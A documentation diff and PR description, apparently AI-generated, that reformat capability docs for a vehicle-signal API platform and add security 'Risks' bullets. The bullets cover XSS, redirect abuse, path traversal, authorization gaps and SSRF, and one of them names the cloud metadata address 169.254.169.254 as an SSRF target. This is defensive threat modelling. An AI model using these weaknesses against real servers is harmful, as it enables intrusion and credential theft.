+- **Recovery-time secret exposure:** during restore, decrypted secrets may flow into admin-visible output/logs, widening the window for capture.
 
 ## Privacy policy
 
-- **Description:** Public Privacy Policy page from `PRIVACY_POLICY_CONTENT` markdown; admin editor with edit/preview + history.
-- **Who uses it / value:** End users (legal info); admins (maintain policy).
-- **Acceptance criteria:**
-  - Route `/privacy-policy` (public) renders the markdown; `PrivacyPolicySection` (admin) edits + previews.
-- **Quality control:** Edit the policy → public page updates; `PRIVACY_POLICY_URL` can redirect instead.
-- **Security:** Page public; editor admin.
-- **Data protection:** Policy markdown only.
+### Description
+
+Public Privacy Policy page from `PRIVACY_POLICY_CONTENT` markdown; admin editor with edit/preview + history.
+
+### Who uses it / value
+
+End users (legal info); admins (maintain policy).
+
+### Acceptance criteria
+
+- Route `/privacy-policy` (public) renders the markdown; `PrivacyPolicySection` (admin) edits + previews.
+
+### Quality control
+
+Edit the policy → public page updates; `PRIVACY_POLICY_URL` can redirect instead.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"PrivacyPolicySection"| CFG["PRIVACY_POLICY_CONTENT (markdown)"]
+    CFG -->|render public| P(["/privacy-policy"])
+    URL["PRIVACY_POLICY_URL"] -.->|redirect| P
+```
+
+### Security
+
+Page public; editor admin.
+
+**Risks:**
+- **Markdown XSS:** if `PRIVACY_POLICY_CONTENT` markdown is rendered without sanitization, an admin (or compromised admin) could inject scripts into a page visited by every user for legal/trust reasons.
+- **Redirect abuse via `PRIVACY_POLICY_URL`:** if `PRIVACY_POLICY_URL` can be set to an external URL, an attacker with admin access could redirect the privacy policy to a phishing page, undermining legal trust.
+
+### Data protection
+
+Policy markdown only.
+
+**Risks:**
+- **Legal-text tampering:** unauthorized edits to the published policy could change stated data-handling commitments, creating legal exposure and misleading users about what their data is used for.

--- a/docs/capabilities/vehicle-apis.md
+++ b/docs/capabilities/vehicle-apis.md
@@ -2,85 +2,315 @@
 
 The signal/API layer over models: VSS/COVESA, extended (wishlist) signals, and the admin-defined Custom APIs. Backend: `routes/v2/vehicle-data/{api,extendedApi,custom-api-set}.route.js`, `routes/v2/system/custom-api-schema.route.js`, `models/{api,extendedApi,customApiSchema,customApiSet}.model.js`. Frontend: `pages/PageVehicleApi.tsx`, `components/organisms/{ViewApiCovesa,CustomApi*}.tsx`.
 
+```mermaid
+flowchart TD
+    VSS["VSS catalog<br/>(backend/data/*.json)"] --> V["VSS versions & CVI trees"]
+    V --> M["Per-model VSS/COVESA API"]
+    M --> COMP["Computed CVI<br/>(VSS + extended merged)"]
+    EXT["Extended APIs<br/>(wishlist signals)"] --> COMP
+    M -.->|"replace from URL"| REP["Replace APIs from VSS spec"]
+    UI["Vehicle API view<br/>(List/Tree/Hierarchical/Compare)"] --> COMP
+    SCH["Custom API schemas<br/>(admin templates)"] --> SETS["Custom API sets<br/>(per-model instances)"]
+    SETS -.->|attach to| MODEL["model.custom_api_sets"]
+    COMP --> UI
+    style VSS fill:#fef3c7
+    style COMP fill:#dbeafe
+    style SCH fill:#fef3c7
+    style SETS fill:#dcfce7
+```
+
 ---
 
 ## VSS versions & CVI trees
 
-- **Description:** Lists available VSS (Vehicle Signal Specification) versions from `backend/data/*.json` and serves a version's computed CVI (Computed Vehicle Interface) tree.
-- **Who uses it / value:** End users (browse signals); integrators (pick a VSS version); the platform (canonical signal catalog).
-- **Acceptance criteria:**
-  - `GET /v2/apis/vss` → `200` list of versions (e.g. `['4.0','3.1.1',…]`).
-  - `GET /v2/apis/vss/:name` → `200` that version's CVI tree.
-  - Static `GET /vss/:version/:filename` serves the raw JSON (1-hour cache; RC→rc normalization).
-- **Quality control:** List versions → non-empty; fetch a version's tree → returns the CVI object; static `/vss/<version>/<file>` returns JSON.
-- **Security:** Public (no auth).
-- **Data protection:** Static reference data only; no PII.
+### Description
+
+Lists available VSS (Vehicle Signal Specification) versions from `backend/data/*.json` and serves a version's computed CVI (Computed Vehicle Interface) tree.
+
+### Who uses it / value
+
+End users (browse signals); integrators (pick a VSS version); the platform (canonical signal catalog).
+
+### Acceptance criteria
+
+- `GET /v2/apis/vss` → `200` list of versions (e.g. `['4.0','3.1.1',…]`).
+- `GET /v2/apis/vss/:name` → `200` that version's CVI tree.
+- Static `GET /vss/:version/:filename` serves the raw JSON (1-hour cache; RC→rc normalization).
+
+### Quality control
+
+List versions → non-empty; fetch a version's tree → returns the CVI object; static `/vss/<version>/<file>` returns JSON.
+
+### Security
+
+Public (no auth).
+
+**Risks:**
+- **Path-traversal in static serving:** the static `GET /vss/:version/:filename` handler maps URL segments to files under `backend/data/`; a weak normalization/caching path could be abused to read arbitrary JSON files from the server if segment sanitization misses encoded or `..` paths.
+- **Catalog exposure:** the unauthenticated version list discloses every VSS version the platform supports, giving an attacker the full signal taxonomy to target downstream integrations against.
+
+### Data protection
+
+Static reference data only; no PII.
+
+**Risks:**
+- **Stale-spec leakage:** cached (1-hour) static JSON can keep serving a deprecated/superseded VSS version long after an admin intends to retire it, so consumers keep building against data the platform believed retired.
 
 ## Per-model VSS/COVESA API CRUD + computed tree
 
-- **Description:** Each model has an `Api` document holding its VSS definition; the computed API merges VSS + extended (wishlist) APIs into a single tree.
-- **Who uses it / value:** Model owners (define the signal set); end users (consume signals in dashboards/code).
-- **Acceptance criteria:**
-  - `POST /v2/apis` (auth) → `201` create `Api`; `GET /v2/apis/:id` → `200`; `PATCH` → `200`; `DELETE` → `204`; `GET /v2/apis/model_id/:modelId` → `200` the model's API.
-  - `GET /v2/models/:id/api` (optional auth) → `200` computed CVI (VSS + extended merged); `GET /v2/models/:id/api/:apiName` → `200` one API's detail (`name`, `datatype`, `type`, `unit?`, `min?`, `max?`, `description?`).
-- **Quality control:** Create an API for a model → computed tree includes it; fetch `Vehicle.Speed` detail → returns datatype/unit.
-- **Security:** Read optional via `PUBLIC_VIEWING`; write requires auth (owner/admin).
-- **Data protection:** API definitions stored in `apis` (references `model` + `created_by`).
+### Description
+
+Each model has an `Api` document holding its VSS definition; the computed API merges VSS + extended (wishlist) APIs into a single tree.
+
+### Who uses it / value
+
+Model owners (define the signal set); end users (consume signals in dashboards/code).
+
+### Acceptance criteria
+
+- `POST /v2/apis` (auth) → `201` create `Api`; `GET /v2/apis/:id` → `200`; `PATCH` → `200`; `DELETE` → `204`; `GET /v2/apis/model_id/:modelId` → `200` the model's API.
+- `GET /v2/models/:id/api` (optional auth) → `200` computed CVI (VSS + extended merged); `GET /v2/models/:id/api/:apiName` → `200` one API's detail (`name`, `datatype`, `type`, `unit?`, `min?`, `max?`, `description?`).
+
+### Quality control
+
+Create an API for a model → computed tree includes it; fetch `Vehicle.Speed` detail → returns datatype/unit.
+
+```mermaid
+flowchart LR
+    O([Model owner]) -->|"POST /v2/apis"| API["Api document"]
+    EXT["Extended APIs"] -.->|merge| COMP["GET /v2/models/:id/api<br/>(computed CVI)"]
+    API -.->|merge| COMP
+    U([End user]) -->|"GET /v2/models/:id/api/:apiName"| COMP
+```
+
+### Security
+
+Read optional via `PUBLIC_VIEWING`; write requires auth (owner/admin).
+
+**Risks:**
+- **Computed-tree leak of private signals:** `GET /v2/models/:id/api` is optional-auth via `PUBLIC_VIEWING`; if a private model's computed tree were served without the access-scoping check, its entire signal definition set would leak to anonymous callers.
+- **Unauthorized signal tampering:** a missing auth check on `PATCH /v2/apis/:id` would let any authenticated user rewrite another tenant's signal definitions, corrupting dashboards and downstream consumers.
+
+### Data protection
+
+API definitions stored in `apis` (references `model` + `created_by`).
+
+**Risks:**
+- **Cross-tenant signal inference:** `created_by` and `model` references in `Api` documents can reveal which user owns which model's signal set; a listing gap could expose private ownership relationships.
 
 ## Replace APIs from a VSS spec
 
-- **Description:** Replace **all** APIs for a model from a VSS spec JSON at a URL.
-- **Who uses it / value:** Model owners (swap the signal set to a new VSS version).
-- **Acceptance criteria:**
-  - `POST /v2/models/:id/replace-api {api_data_url}` (requires `WRITE_MODEL`) → `200`; missing `api_data_url` → `400`. ⚠️ Destructive — replaces all APIs.
-- **Quality control:** Replace from a VSS URL → computed tree changes to the new spec; verify with `GET /v2/models/:id/api`.
-- **Security:** Requires `WRITE_MODEL`.
-- **Data protection:** Overwrites the model's `Api` document; the old set is lost (no undo beyond change logs).
+### Description
+
+Replace **all** APIs for a model from a VSS spec JSON at a URL.
+
+### Who uses it / value
+
+Model owners (swap the signal set to a new VSS version).
+
+### Acceptance criteria
+
+- `POST /v2/models/:id/replace-api {api_data_url}` (requires `WRITE_MODEL`) → `200`; missing `api_data_url` → `400`. ⚠️ Destructive — replaces all APIs.
+
+### Quality control
+
+Replace from a VSS URL → computed tree changes to the new spec; verify with `GET /v2/models/:id/api`.
+
+```mermaid
+sequenceDiagram
+    participant O as Model owner
+    participant API as POST /v2/models/:id/replace-api
+    participant URL as api_data_url
+    participant DB as Api document
+    O->>API: {api_data_url}
+    API->>API: check WRITE_MODEL
+    API->>URL: fetch VSS spec JSON
+    URL-->>API: spec JSON
+    API->>DB: overwrite ALL apis
+    API-->>O: 200
+    Note over DB: old signal set lost (no undo)
+```
+
+### Security
+
+Requires `WRITE_MODEL`.
+
+**Risks:**
+- **SSRF via `api_data_url`:** the server fetches the user-supplied URL to pull the VSS spec; without an allowlist or internal-address blocking, an attacker with `WRITE_MODEL` can make the server probe internal services (`http://169.254.169.254/…`, localhost admin ports).
+- **Destructive overwrite by a stolen token:** a single call replaces the entire `Api` document, so a leaked `WRITE_MODEL` token lets an attacker wipe a model's signal set irreversibly in one request.
+
+### Data protection
+
+Overwrites the model's `Api` document; the old set is lost (no undo beyond change logs).
+
+**Risks:**
+- **Irreversible signal-set loss:** the old API set is hard-overwritten with no soft-delete or snapshot, so a malicious or mistaken replace permanently destroys the prior signal definitions — recoverable only from change logs if they exist.
 
 ## Vehicle API view (List / Tree / Hierarchical / Compare)
 
-- **Description:** UI to browse the computed COVESA/VSS APIs in List, Tree, Hierarchical, and a VSS comparator; download computed VSS; upload/replace VSS; switch VSS version.
-- **Who uses it / value:** End users (explore signals); model owners (compare/replace VSS).
-- **Acceptance criteria:**
-  - Routes `/model/:id/api`, `/model/:id/api/covesa/:api` render the views; download returns computed VSS JSON; replace/upload requires `WRITE_MODEL`.
-  - View subject to `PUBLIC_VIEWING`; replace requires `WRITE_MODEL`.
-- **Quality control:** Switch view modes → tree/list/hierarchy render; compare two versions → diffs shown; download → valid JSON.
-- **Security:** Read optional; replace `WRITE_MODEL`.
-- **Data protection:** Computed from stored `Api`/`ExtendedApi`; download exposes the model's signal definitions.
+### Description
+
+UI to browse the computed COVESA/VSS APIs in List, Tree, Hierarchical, and a VSS comparator; download computed VSS; upload/replace VSS; switch VSS version.
+
+### Who uses it / value
+
+End users (explore signals); model owners (compare/replace VSS).
+
+### Acceptance criteria
+
+- Routes `/model/:id/api`, `/model/:id/api/covesa/:api` render the views; download returns computed VSS JSON; replace/upload requires `WRITE_MODEL`.
+- View subject to `PUBLIC_VIEWING`; replace requires `WRITE_MODEL`.
+
+### Quality control
+
+Switch view modes → tree/list/hierarchy render; compare two versions → diffs shown; download → valid JSON.
+
+### Security
+
+Read optional; replace `WRITE_MODEL`.
+
+**Risks:**
+- **Download exfiltration:** the download action returns the full computed VSS JSON, so a `PUBLIC_VIEWING=true` misconfiguration or a leaked read path hands the entire signal definition set to an anonymous user.
+- **Replace-action privilege bypass:** the replace/upload path in the UI must enforce `WRITE_MODEL` server-side; relying on UI hiding alone would let a crafted `POST /v2/models/:id/replace-api` call succeed for any authenticated user.
+
+### Data protection
+
+Computed from stored `Api`/`ExtendedApi`; download exposes the model's signal definitions.
+
+**Risks:**
+- **Bulk signal export:** a single download bundles every signal (including extended/wishlist signals unique to the model), giving one request a high-value exfiltration payload if access scoping is wrong.
 
 ## Extended APIs (wishlist signals)
 
-- **Description:** Custom per-model signals layered on top of the VSS tree; merged into the computed API.
-- **Who uses it / value:** Model owners (add signals beyond standard VSS); end users (use the extended signals).
-- **Acceptance criteria:**
-  - `GET /v2/extendedApis?model=<id>` (optional auth; caller must have model access) → `200` list; `POST` → `201`; `GET /by-api-and-model?apiName=&model=` → `200`; `GET/PATCH/DELETE /:id` → `200`/`200`/`204`.
-  - `GET /` requires `model` query; `by-api-and-model` requires `apiName` + `model`; no access → `403`.
-  - Unique per `(apiName, model)`.
-- **Quality control:** Create an extended signal → appears in the computed tree; create a duplicate `(apiName, model)` → rejected; access another user's private model → `403`.
-- **Security:** Read optional; write requires auth + model access. Uniqueness enforced.
-- **Data protection:** Stored in `extendedapis` with `(apiName, model)` unique index.
+### Description
+
+Custom per-model signals layered on top of the VSS tree; merged into the computed API.
+
+### Who uses it / value
+
+Model owners (add signals beyond standard VSS); end users (use the extended signals).
+
+### Acceptance criteria
+
+- `GET /v2/extendedApis?model=<id>` (optional auth; caller must have model access) → `200` list; `POST` → `201`; `GET /by-api-and-model?apiName=&model=` → `200`; `GET/PATCH/DELETE /:id` → `200`/`200`/`204`.
+- `GET /` requires `model` query; `by-api-and-model` requires `apiName` + `model`; no access → `403`.
+- Unique per `(apiName, model)`.
+
+### Quality control
+
+Create an extended signal → appears in the computed tree; create a duplicate `(apiName, model)` → rejected; access another user's private model → `403`.
+
+```mermaid
+flowchart TD
+    O([Model owner]) -->|"POST /v2/extendedApis?model=id"| E["extendedapis document"]
+    E -->|"(apiName, model) unique"| DB[("extendedapis")]
+    E -.->|merged into| COMP["Computed CVI"]
+    U([End user]) -->|"GET /by-api-and-model"| E
+    U -->|"no model access"| N1["403"]
+```
+
+### Security
+
+Read optional; write requires auth + model access. Uniqueness enforced.
+
+**Risks:**
+- **Cross-tenant signal injection:** if the model-access check on `POST` were bypassed, an authenticated user could inject extended signals into another tenant's private model, polluting its computed CVI.
+- **Uniqueness-bypass collision:** the `(apiName, model)` unique index is the only dedupe guard; a race or a check that runs before index validation could create duplicate signals that confuse downstream consumers.
+
+### Data protection
+
+Stored in `extendedapis` with `(apiName, model)` unique index.
+
+**Risks:**
+- **Wishlist-signal disclosure:** extended signals often encode proprietary behavior beyond standard VSS; a read-path gap would expose this proprietary wishlist to unauthorized users.
 
 ## Custom API schemas
 
-- **Description:** Admin-defined API schema templates (`type` tree/list/graph) with a JSON `schema`, `id_format`, `relationships`, `tree_config`, `display_mapping`; used to validate Custom API Sets.
-- **Who uses it / value:** Admins (define custom API shapes); integrators (non-COVESA APIs like REST/USP).
-- **Acceptance criteria:**
-  - `GET /v2/custom-api-schema[/:id]` (public) → list/get; `POST/PATCH/DELETE /v2/custom-api-schema[/:id]` (admin) → `201`/`200`/`204`. Mounted at both `/v2/system/custom-api-schema` (frontend) and the bare `/v2/custom-api-schema`.
-  - Create requires `schema` (JSON string); old `attributes` field is gone.
-  - Item validation against the schema is basic (full JSON-schema validation is a TODO).
-- **Quality control:** Admin creates a `list` schema with a `schema` string → `201`; non-admin create → `403`; list → public reads it.
-- **Security:** Read public; write requires `MANAGE_USERS`. No secrets in schemas.
-- **Data protection:** Schema definitions stored in `customapischemas` (`code` unique).
+### Description
+
+Admin-defined API schema templates (`type` tree/list/graph) with a JSON `schema`, `id_format`, `relationships`, `tree_config`, `display_mapping`; used to validate Custom API Sets.
+
+### Who uses it / value
+
+Admins (define custom API shapes); integrators (non-COVESA APIs like REST/USP).
+
+### Acceptance criteria
+
+- `GET /v2/custom-api-schema[/:id]` (public) → list/get; `POST/PATCH/DELETE /v2/custom-api-schema[/:id]` (admin) → `201`/`200`/`204`. Mounted at both `/v2/system/custom-api-schema` (frontend) and the bare `/v2/custom-api-schema`.
+- Create requires `schema` (JSON string); old `attributes` field is gone.
+- Item validation against the schema is basic (full JSON-schema validation is a TODO).
+
+### Quality control
+
+Admin creates a `list` schema with a `schema` string → `201`; non-admin create → `403`; list → public reads it.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"POST/PATCH/DELETE<br/>(MANAGE_USERS)"| S["customapischemas"]
+    U([Public / integrator]) -->|"GET (public)"| S
+    S -.->|validates| SETS["Custom API sets"]
+```
+
+### Security
+
+Read public; write requires `MANAGE_USERS`. No secrets in schemas.
+
+**Risks:**
+- **Platform-wide validation template poisoning:** schemas are the validation gate for every Custom API Set; a compromised admin could push a permissive `schema` that accepts arbitrary malicious API payloads into all derived sets.
+- **Weak validation as an attack surface:** item validation is only basic (full JSON-schema validation is a TODO), so malformed or oversized `schema` strings could trigger parser/DB issues in downstream set storage.
+
+### Data protection
+
+Schema definitions stored in `customapischemas` (`code` unique).
+
+**Risks:**
+- **Schema tampering without audit:** a modified schema silently re-shapes what every Custom API Set accepts; without an audit trail of schema changes, a tampered template is hard to detect after malicious sets have been created.
 
 ## Custom API sets
 
-- **Description:** Instances of a Custom API Schema, attachable to a model (`model.custom_api_sets`); scope system (public) / user (owner-only); item-level add/update/remove with validation.
-- **Who uses it / value:** End users/admins (create per-model API sets); model consumers (view custom APIs alongside COVESA).
-- **Acceptance criteria:**
-  - `GET /v2/custom-api-sets` (optional auth via `PUBLIC_VIEWING`) → `200` (system sets public, user sets owner-only); `POST` (auth) → `201`; `GET /:id` (optional auth via `PUBLIC_VIEWING`) → `200`; `PATCH/DELETE /:id` (auth + ownership) → `200`/`204`.
-  - `POST /:id/items {item:{…}}` → `200`; `PATCH/DELETE /:id/items/:itemId` → `200`.
-  - UI hidden when `DISABLE_CUSTOM_API_SETS=true`; adding a set to a model requires `WRITE_MODEL`.
-  - Create validates `data` against the referenced schema (`customApiSchemaService.validateApiData`).
-- **Quality control:** Create a system-scoped set → any authenticated user can read; create a user-scoped set → only owner reads; add an item → appears in the set; toggle `DISABLE_CUSTOM_API_SETS` → UI hidden.
-- **Security:** ⚠️ No admin gate for system-scope sets — any authenticated user can create/update/delete a system-scoped set (only user-scope is owner-gated). Reads respect scope + `PUBLIC_VIEWING`. Item ops require auth.
-- **Data protection:** Sets stored in `customapisets` with `owner`/`created_by`; entire API set in one document (`data.items[]`, mind 16 MB limit).
+### Description
+
+Instances of a Custom API Schema, attachable to a model (`model.custom_api_sets`); scope system (public) / user (owner-only); item-level add/update/remove with validation.
+
+### Who uses it / value
+
+End users/admins (create per-model API sets); model consumers (view custom APIs alongside COVESA).
+
+### Acceptance criteria
+
+- `GET /v2/custom-api-sets` (optional auth via `PUBLIC_VIEWING`) → `200` (system sets public, user sets owner-only); `POST` (auth) → `201`; `GET /:id` (optional auth via `PUBLIC_VIEWING`) → `200`; `PATCH/DELETE /:id` (auth + ownership) → `200`/`204`.
+- `POST /:id/items {item:{…}}` → `200`; `PATCH/DELETE /:id/items/:itemId` → `200`.
+- UI hidden when `DISABLE_CUSTOM_API_SETS=true`; adding a set to a model requires `WRITE_MODEL`.
+- Create validates `data` against the referenced schema (`customApiSchemaService.validateApiData`).
+
+### Quality control
+
+Create a system-scoped set → any authenticated user can read; create a user-scoped set → only owner reads; add an item → appears in the set; toggle `DISABLE_CUSTOM_API_SETS` → UI hidden.
+
+```mermaid
+flowchart TD
+    U([User / admin]) -->|"POST /v2/custom-api-sets"| SET["customapisets document"]
+    SET --> SC["scope: system (public) | user (owner)"]
+    SET -.->|"validate against"| SCH["Custom API schema"]
+    U -->|"POST /:id/items"| ITEMS["data.items[]"]
+    ITEMS --> SET
+    SET -.->|attach| MODEL["model.custom_api_sets<br/>(WRITE_MODEL)"]
+    FLAG{"DISABLE_CUSTOM_API_SETS=true"} -.->|hides| UI["UI"]
+```
+
+### Security
+
+⚠️ No admin gate for system-scope sets — any authenticated user can create/update/delete a system-scoped set (only user-scope is owner-gated). Reads respect scope + `PUBLIC_VIEWING`. Item ops require auth.
+
+**Risks:**
+- **System-scope set takeover:** because system-scope sets have no admin gate, any authenticated user (not just admins) can create, update, or delete system-scoped sets that every tenant reads — a low-privilege account can tamper with shared, platform-visible API definitions.
+- **Cross-tenant system-set pollution:** a system-scoped set is public across tenants; without ownership/tenant scoping on system-scope writes, one user can push hostile or malformed API definitions visible to all consumers, with no admin approval step.
+- **Item-level bypass:** `POST/PATCH/DELETE /:id/items` require auth but not re-validated ownership on every item op in the spec — if item ops aren't scoped to the set owner, any authenticated user could mutate another user's set items.
+
+### Data protection
+
+Sets stored in `customapisets` with `owner`/`created_by`; entire API set in one document (`data.items[]`, mind 16 MB limit).
+
+**Risks:**
+- **Document-growth DoS:** the whole set lives in one MongoDB document capped at 16 MB; an attacker who can append items unbounded could push the document toward the limit, corrupting or rejecting the entire set's storage.
+- **Owner-data leak via system scope:** a user mistakenly creating a system-scoped set instead of a user-scoped one exposes their custom API definitions (potentially proprietary) to every authenticated user — an irreversible misclassification with no prompt to revert.


### PR DESCRIPTION
## What

Reformats the capability catalog in `docs/capabilities/` (README index + 10 cluster files) to make it easier to scan and to surface security/data-protection risk explicitly.

## Changes

- **Section structure:** each capability's six sections move from inline `- **Section:** text` bullets to `### Section` headers with paragraph content (bullet list kept under Acceptance criteria).
- **Risks:** every `### Security` and `### Data protection` section now ends with a `**Risks:**` bullet list stating concretely what could be lost or how the capability could be attacked (data exposure, privilege escalation, irreversible data loss, token theft, enumeration, supply-chain/plugin, SSRF, audit gaps).
- **Mermaid diagrams:** a cluster-level diagram at the top of each cluster file showing how its capabilities relate / the main data or request flow, plus per-capability diagrams (sequence/flowchart/state) where a request flow or state transition is worth illustrating.
- **README index** updated to document the new section format.

## Scope / safety

All previously-verified endpoint paths, HTTP status codes, gating flags (`PUBLIC_VIEWING`, `WRITE_MODEL`, `MANAGE_USERS`, `USE_GEN_AI`, ...), and file paths are preserved verbatim — this is a structural + risk + diagram pass only, no technical claims changed. Capability counts per cluster are unchanged (no capabilities added/dropped). "Learning mode" remains absent from integrations-platform per the prior review.

## Verification

- Format consistency checked across all 11 files: `### Description`/`### Security`/`### Data protection` counts match per file; `**Risks:**` count = 2× sections in every cluster.
- Mermaid fence balance verified; subgraph/loop/alt `end` balance verified.
- Spot-checked risk bullets and diagrams on identity-access, integrations-platform, models — grounded and consistent with the code-grounded claims.

🤖 Generated with [Claude Code](https://claude.com/claude-code)